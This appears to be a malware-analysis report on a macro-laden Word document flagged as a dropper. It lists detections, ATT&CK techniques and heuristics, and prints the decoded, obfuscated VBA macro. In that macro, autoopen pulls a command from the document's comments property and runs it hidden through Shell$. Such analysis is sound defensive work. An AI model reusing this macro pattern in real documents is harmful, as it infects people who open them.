MALICIOUS
152
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains VBA macros, including an AutoOpen macro, and a critical heuristic indicates a potential Shell call. ClamAV identifies it as 'Doc.Dropper.Agent-6340521-0'. The VBA script is heavily obfuscated, but its structure and the presence of a 'macros.bas' file suggest it is designed to download and execute a secondary payload, likely exploiting a vulnerability for client execution.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6340521-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6340521-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
sNnxXXWTuYB = "mkBaYYRTa" + "XuXtDpkGBr" + "YnBYhekRt" + "yYsFTRcmEVN" + "vRtEHLKYz" + GurpsyPWpZ = "LMMAuanGN" + "hbwYuBNZBxT" + "SUUkyeVpNhn" + "SgvCUcwfXD" + "PTDUKDKCwS" + "VMXPazvvXZ" Shell$ "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + PBgapTPRnHw + Mid(NrvyPdN, 40) + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + XkgssYWAC, 0 TczWGRhTe = "GteLYyxd" + "cFGrkca" + "FUMmkPtpAgt" + "WMaGfEYwuG" + "evnywAPwVVe" + WmAmHkLemW = "gNCSxuK" + "FgSgTGxPUUr" + "fSbHpzY" + "nTVUNWtYpR" + "zabybWrgCbH" + NasynaB = "sSrnkcuPbn" + "LEbkfzk" + "SYHHfhFUH" + "RwLKPKwuf" + "WeMWfnWf" + rfXUWNSeG = "BTSNpkEyB" + "eLcTrdd" + "rsxpSLHZDh" + "hwrZBAFrHeB" + "eNubVBSaA" + "nBXeeCpvZ" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() fdSZuSKDbTn -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7001 bytes |
SHA-256: f3415535efe8b12fc06e3356a37c7341b1fbfce18902579736a417760387ec34 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
369 of 442 identifiers look randomly generated (e.g. 'vUGfKDmDTxM') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function fdSZuSKDbTn() RAhBhdB = "UYynyWY" + "SFYmMKHgMY" + "GTvmTnLa" + "KkvwXbXrf" + "pswtVdpG" + CXGZVUcapC = "SsRzuzpGfY" + "BszZXvEb" + "PvKwhZDeW" + "hWnFpRk" + "MLNRtZgUf" + gTygEwPkzgD = "FuBUSkX" + "aFwXyRdHaG" + "zShngUg" + "PtcuTUC" + "atNtsULNDx" + "ShSHUUsvCxu" rGgSmMz = "buABXTyrRTb" + "AYUbNUVbd" + "VgVveDmWr" + "fAUFBvvKCDc" + "rXsgRHm" + nPZMmZesg = "YvuECXPCcS" + "vNarzxTkKKD" + "EprhGCuHcEb" + "nKaRKsZhzpN" + "tcSShKRx" + "bDeVWyBheE" XLnGfhuDT = "aBnWKEbgS" + "vtgzGLvhpKX" + "NXMEMrPA" + "zUPmxFMVc" + "vzMfUtPEeh" + fhMKvxHwL = "CmwsmGT" + "fDsSmWrybZk" + "ggyFfkVpdG" + "EvXssbs" + "SUELYmHG" + "atGNhTnNX" PBgapTPRnHw = "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + Mid(NrvyPdN, 1, 2) + Mid(NrvyPdN, 11, 4) + Mid(NrvyPdN, 23, 7) + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + " " nRdbwDpA = "bFSwKEfp" + "rdaSeDxS" + "WTeWCBmXnnV" + "enVcCudyN" + "atBZdLEhTXd" + RnhPrXXG = "cdDSYxH" + "FdkfUhxTf" + "gLHzvpBgzn" + "TCZnWWYHc" + "bSgRxHgVmUV" + "KWFBkKD" UHUAeUtWhz = "yHLDuNBykHd" + "AVKbkLBDwr" + "gNpRTtzrp" + "mfSnSdsZwK" + "eEEDfEEA" + mYvHLEngWE = "ynLYPZekXz" + "ZwuYLdKkN" + "nkDrEMydL" + "gCZkFNtH" + "uxwDNayaWTm" + pdXLfDwEY = "YxvRRhw" + "CUysYXnmnGp" + "EXfebbEwdHh" + "rDGNVWckxf" + "ABKLAmeEwCz" + "NnsyxwvkPfW" YfpXECK = "RpBvuRwt" + "fpGrkte" + "yvRZUbreFh" + "MhSmDrfWHcs" + "ZHLBRuzmWDt" + aSYSTVRZpRd = "cZUHHNVSXL" + "kPERwPfDLZx" + "bcgKzEMh" + "ACGTvPmzHe" + "GbfKcUuupPE" + kyppwCrZmND = "WxScZtkrkfs" + "MXVAEeFMc" + "BPkdcKCvnEM" + "rZrgBNK" + "rRnWgRcxWG" + "pMXMhYTdGu" fYKSnyAZuTz = "rwVnCkE" + "PmeYkVfpF" + "vfPzxyBn" + "MudUnkMzLzr" + "PGXfNnRd" + FRPSrFA = "ttWfddv" + "sNbaYAf" + "SpUkNCgMM" + "GEfYYCSfc" + "HrFvTDCH" + tmdYLvh = "vPthLZAyBwE" + "LXtdgVMBw" + "AutpnZzkrGw" + "sSpWCEt" + "RrCrmVYy" + "BPVyBPL" PGLvKmAgUSz = "ECPweNARs" + "EAPuPhDdGE" + "aEUgZUuKFpr" + "UNPdktAH" + "AMmSxceCkt" + fVvNNGdzk = "STcHsybaMA" + "NuBYzXPyTe" + "tABDshKrzdF" + "gsakbtX" + "zLXTWwdY" + "TCuuxDMUuE" sNnxXXWTuYB = "mkBaYYRTa" + "XuXtDpkGBr" + "YnBYhekRt" + "yYsFTRcmEVN" + "vRtEHLKYz" + GurpsyPWpZ = "LMMAuanGN" + "hbwYuBNZBxT" + "SUUkyeVpNhn" + "SgvCUcwfXD" + "PTDUKDKCwS" + "VMXPazvvXZ" Shell$ "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + PBgapTPRnHw + Mid(NrvyPdN, 40) + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + XkgssYWAC, 0 TczWGRhTe = "GteLYyxd" + "cFGrkca" + "FUMmkPtpAgt" + "WMaGfEYwuG" + "evnywAPwVVe" + WmAmHkLemW = "gNCSxuK" + "FgSgTGxPUUr" + "fSbHpzY" + "nTVUNWtYpR" + "zabybWrgCbH" + NasynaB = "sSrnkcuPbn" + "LEbkfzk" + "SYHHfhFUH" + "RwLKPKwuf" + "WeMWfnWf" + rfXUWNSeG = "BTSNpkEyB" + "eLcTrdd" + "rsxpSLHZDh" + "hwrZBAFrHeB" + "eNubVBSaA" + "nBXeeCpvZ" cmPCbZANY = "NztRXUNNN" + "RZDuWvGkXLk" + "EXmAEdvFE" + "SudSNVM" + "xyZFfDMmCD" + ScSSReseZn = "rsgWYtVu" + "CvYDvdbM" + "MnBdLeC" + "eEcwzSpAy" + "LneLvmV" + uTcNZfd = "HdxpyRdvya" + "STAaTBRDVz" + "eKdHUTUZ" + "FZeBGYyuYR" + "HtLXLbcCXU" + "vHKxArRZuD" ghzvaADD = "EHcXYRPzu" + "nZpCEPCVw" + "TfhBWCwMPwh" + "uNdRanaLEX" + "CTTErKPuT" + pdASsyD = "zabhKZrNR" + "MdayhpmsAt" + "KrZyxYM" + "ZExsTuNEUXD" + "UFGCynS" + bYNctNWbN = "maeNmNFxm" + "aNeccSg" + "UyBnRXz" + "wBZUBBKZPnk" + "CpuGcay" + "zPbNCWN" gUBFftZ = "WmLUxtem" + "EMnEksuHK" + "SHMfsDysTdn" + "BHtUahCbEr" + "UZfvVCz" + SFzrgpKADWv = "gLueXszMgR" + "kbSAcLtkyw" + "taTcvfAw" + "ZfCxRCR" + "NfUXUsXRvg" + "vvbANaR" End Function Function NrvyPdN() EuyWgeeD = "CLDAyMvwmVY" + "YCTLnpSVH" + "pMCGDNGR" + "XGwMunWS" + "rLkEStGgCfT" + aYbnxCt = "tFsesPcAPGn" + "kDrsdVscps" + "MuUVncwYyR" + "dDEvgRev" + "pnaTafxepYE" + nVbUtZUnDn = "aWEhcGDrL" + "tmzUbfr" + "dsbfauUs" + "YKtSahWYn" + "UnkRNMLKvGn" + VnEaMaub = "WKGySEFDu" + "xnRapFpcz" + "BKKFvfERw" + "pDdcHKV" + "tMAvZbBFbd" + "RtEfPXRrYmg" axLhHyuAF = "dKZpePEzmZt" + "gEuDcXxTG" + "BTTXmRDV" + "GWTRDuyNDm" + "aFeKzbW" + fuygVtZhN = "kcpbkyMD" + "LzkTyXS" + "nTrhKaB" + "VnTTLDFc" + "nDZMbsw" + hAMpUcU = "dCSkaEt" + "UbUFCTwv" + "VysabpE" + "KSGMFFV" + "vUGfKDmDTxM" + "MPbFdKLn" bkksnVUD = "XRtwxtAc" + "tGZFHdTXVeA" + "mESFZAEwsHg" + "xKfFWeV" + "HUdnUtHkCP" + LamwhFTwDU = "hZLSVeg" + "ZBzUPBBg" + "uprEScKd" + "mzwUdap" + "SNGhCSrUB" + "FaDZLAexkC" zzxnrPLvzk = "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + "comme" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + "nts" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + YDBkdRZ sCpSyfPRNt = "KyaeuUXzCUS" + "DhCPExHEXc" + "WHVfwsPg" + "kXEZAUWns" + "BkwCyWsE" + ZNFcbVpZm = "CHpdgFA" + "VYmCZZLWr" + "bCCFsNMaz" + "PngMhwnS" + "YdxrNXR" + GxTvfSyxH = "xppapFXGT" + "PPvVSwwEX" + "sYypnZUZt" + "ADCZKFgn" + "fyYEDUZRu" + "LecBdRA" rrSUrvhDEkN = "tfbfTnX" + "GsYSzSHLkUs" + "vuDAWmDevsx" + "fDtNrTxa" + "WUXKzSNhcBR" + mFVDXfGc = "fVKBLRnFvZ" + "rLPbBvB" + "rEVwSTyCrTT" + "VdTkhFL" + "ELvnCEStA" + SbsSHvfH = "AmZhpwW" + "YGBnKdUVEF" + "rrXyMwfvmR" + "ByfePnXCPkE" + "aNuLwTDuzyR" + "pNNueYguDt" swdgFues = "PamUBZWxXL" + "atUHuHueB" + "YDLFUpTFHaH" + "knUhkttEt" + "vRbmbmSXdH" + peVptkF = "BBhKPue" + "NfvUCHPfAwR" + "dZWGkhmr" + "haTdkRDeRF" + "aUamDyVm" + kypUfeegvY = "MeFfcWMsvA" + "ZNHzbtkVXUx" + "UAnbuEXKfHW" + "fvkxvfzcaE" + "CAAhrUBm" + YZfNwZP = "XFmuwCwmGHH" + "zyHsKtmDAY" + "kscHWhFtCUR" + "gpeKhyN" + "wCFAMuV" + "XNbPvUyLrs" NrvyPdN = "" + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + ActiveDocument.BuiltInDocumentProperties(zzxnrPLvzk) + BRExHnZmrC + fPsFarUVnm + EvwFkbBhXL + rGvkkzUh + YWueYCEEPy + kVukeGskP + xNtTRkpMFM ZGnKHhkRR = "AwmgBMEr" + "tvhVmRsaRD" + "GRVTgXYDc" + "rpEkbdnZU" + "FnPZrnb" + kdffDSM = "sVgLdscDpX" + "MuXBYuN" + "nfWEDVGBMKM" + "aNpbmUzpyK" + "teehhcK" + VRMUcBu = "GYSERGZwu" + "CFZLSEEfN" + "sbTkAgkEMD" + "hKEcCcVgr" + "knNChrasaD" + MEbCsEeA = "cLCKEKEYfrW" + "ENKPMxHULv" + "EFFFdSGVp" + "ubLKxcrHrt" + "aPkFdkF" + "tRypzafrmk" MbPhgwsP = "BZFyHzG" + "hsbnhzTGYTT" + "CbzWNsgG" + "seLFkVBfbC" + "swLLasR" + UcxtNrLy = "kBguFMzGG" + "RuBkyMkae" + "gWZMPgmacXm" + "pGStFxKt" + "frhtZbh" + EtPeutwb = "RdBRxCzk" + "dSchTeC" + "EhVxeHdT" + "sBNXdYRHfD" + "sGARhYaamMF" + yThehhMFk = "HtLLcmPu" + "xtXuyBHtb" + "WmeKguyCBut" + "hfCDKHyz" + "USbwvRsGhRe" + "yyHyyUEata" tpFwtzVT = "URsFzzAA" + "CLuKYTb" + "faSrhRG" + "kZBSUERBYz" + "vYndwyk" + mCmaSkvFrUh = "DPmCKUTyMeY" + "NukUYNgdysA" + "azgxtbVnrF" + "CVNyDXyBn" + "DEHGKux" + cakAFmF = "SyFscFrFDWF" + "ykuGuttL" + "eCbTkrsdMLz" + "zvErvgT" + "cwZBfaDy" + uAEMCNNBHw = "RrPTdngfu" + "vYCfPSzn" + "dSCkMgf" + "xpGddXsx" + "rRsEucEzryB" + "GAmUVyFn" End Function Sub autoopen() fdSZuSKDbTn End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.